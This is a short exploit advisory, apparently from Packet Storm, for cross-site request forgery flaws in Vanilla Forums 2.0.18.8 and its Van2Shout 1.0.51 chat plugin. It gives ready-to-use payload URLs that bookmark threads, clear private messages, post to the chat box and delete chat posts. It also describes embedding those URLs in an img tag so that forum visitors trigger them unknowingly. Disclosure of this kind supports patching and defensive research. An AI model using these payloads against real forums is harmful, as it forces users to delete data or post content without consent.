Vanilla Forums Van2Shout plugin version 1.0.51 suffers from a cross site request forgery vulnerability.
173c0d11460527835e68325e42e00b9fd39bc5fa0ad7310af48fc30fd202963b# Exploit Title:
Vanilla Forums <= 2.0.18.8 & Van2Shout 1.0.51 Multiple CSRF
# Google Dork: n/a
# Date: 13/4/13
# Exploit Author: Henry Hoggard
# Vendor Homepage: [http://vanillaforums.org/ ,
http://vanillaforums.org/addon/van2shout-plugin]
# Software Link: [http://vanillaforums.org/download,
http://vanillaforums.org/get/van2shout-plugin-1.051]
# Version: [2.0.18.8 , 1.0.51]
# Tested on: [Debian]
# CVE :
=======================
You can exploit these by having the user visit a thread with the img src
of the below urls.
eg <img
src="http://site.org/index.php=/vanilla/discussion/bookmark/1337?> where
1337 is the id.
Bookmark CSRF:
http://site.org/index.php=/vanilla/discussion/bookmark/1337
UnBookmark CSRF
http://site.org/index.php=/vanilla/discussion/bookmark/1337?
Delete Message CSRF
http://site.org/index.php=/messages/clear/1337
Post to Van2Shout Chat Box CSRF
http://site.org/index.php?p=/plugin/Van2ShoutData&newpost=testmessage
Delete Message from Van2Shout Chatbox CSRF
http://site.org/index.php?p=/plugin/Van2ShoutData&del=1337
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed